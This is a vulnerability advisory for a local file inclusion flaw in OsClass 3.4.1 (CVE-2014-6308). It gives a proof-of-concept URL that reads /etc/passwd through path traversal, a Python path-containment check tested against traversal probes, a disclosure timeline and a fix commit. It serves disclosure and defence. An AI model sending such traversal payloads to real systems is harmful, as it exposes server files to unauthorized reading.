Information
-----------

Advisory by Netsparker.

Name : LFI Vulnerability in OsClass
Affected Software : OsClass
Affected Versions : 3.4.1 and possibly below
Vendor Homepage : http://osclass.org/
Vulnerability Type : Local File Inclusion
Severity : Critical
CVE-ID : CVE-2014-6308
Netsparker Advisory Reference : NS-14-031


Advisory URL
------------

https://www.netsparker.com/lfi-vulnerability-in-osclass/

Description
-----------

A local file inclusion vulnerability was discovered in Osclass, an
open source project that allows you to create classifieds sites.

Technical Details
-----------------

Proof of Concept URL for LFI in OsClass:

http://example.com/osclass/oc-admin/index.php?page=appearance&action=render&file=../../../../../../../../../../etc/passwd
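As an added illustration, not the Osclass fix linked below and not Netsparker's code, this is the containment check a user-controlled file name such as the `file` parameter above needs before it reaches an include: the name is resolved against the theme directory and rejected unless its canonical path stays inside that directory. The theme directory, the sample file and the probe values are constructed for the demonstration.

```python
"""Path-containment check of the kind an LFI fix needs (illustrative only)."""
import os
import tempfile
from urllib.parse import unquote


def resolve_theme_file(theme_dir: str, requested: str):
    """Return the absolute path of `requested` if it stays inside theme_dir, else None."""
    # Decode once so %2e%2e%2f cannot slip past a textual check; refuse NUL bytes,
    # which older PHP versions used to truncate the path on.
    candidate = unquote(requested)
    if "\x00" in candidate:
        return None
    base = os.path.realpath(theme_dir)
    # os.path.join discards `base` when `candidate` is absolute, so realpath + commonpath
    # is what actually enforces containment, for traversal and absolute paths alike.
    full = os.path.realpath(os.path.join(base, candidate))
    # commonpath avoids the "/srv/theme2" prefix-of-"/srv/theme" trap that startswith() misses.
    if os.path.commonpath([base, full]) != base:
        return None
    if not os.path.isfile(full):
        return None
    return full


def demo():
    """Constructed theme directory; returns which probe values were accepted."""
    with tempfile.TemporaryDirectory() as theme_dir:
        with open(os.path.join(theme_dir, "header.php"), "w") as fh:
            fh.write("<?php // constructed sample theme file ?>")
        probes = [
            "header.php",                                   # legitimate theme file
            "../../../../../../../../../../etc/passwd",     # the advisory's PoC payload
            "%2e%2e%2f%2e%2e%2fetc%2fpasswd",               # same, URL-encoded
            "/etc/passwd",                                  # absolute path
            "header.php\x00.txt",                           # NUL-byte truncation attempt
            "sub/../header.php",                            # normalises back inside the directory
        ]
        return {p: resolve_theme_file(theme_dir, p) is not None for p in probes}


if __name__ == "__main__":
    for probe, accepted in demo().items():
        print(f"{'accept' if accepted else 'reject'}: {probe!r}")
```

Only the first and last probes are accepted; the decision is made on the resolved path, so a request that normalises back into the theme directory passes while every form of escape is refused.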


Advisory Timeline
-----------------

03/09/2014 - First Contact
03/09/2014 - Vulnerability fixed:
https://github.com/osclass/Osclass/commit/c163bf5910d0d36424d7fc678da6b03a0e443435
15/09/2014 - Fix released publicly in Osclass 3.4.2

Credits & Authors
-----------------

These issues have been discovered by Omar Kurt while testing
Netsparker Web Application Security Scanner.

About Netsparker
----------------

Netsparker can find and report security issues and vulnerabilities
such as SQL Injection and Cross-site Scripting (XSS) in all websites
and web applications regardless of the platform and the technology
they are built on. Netsparker's unique detection and exploitation
techniques allow it to be dead accurate in reporting, which is why it
is the first and only false-positive-free web application security
scanner. For more information on Netsparker visit
https://www.netsparker.com.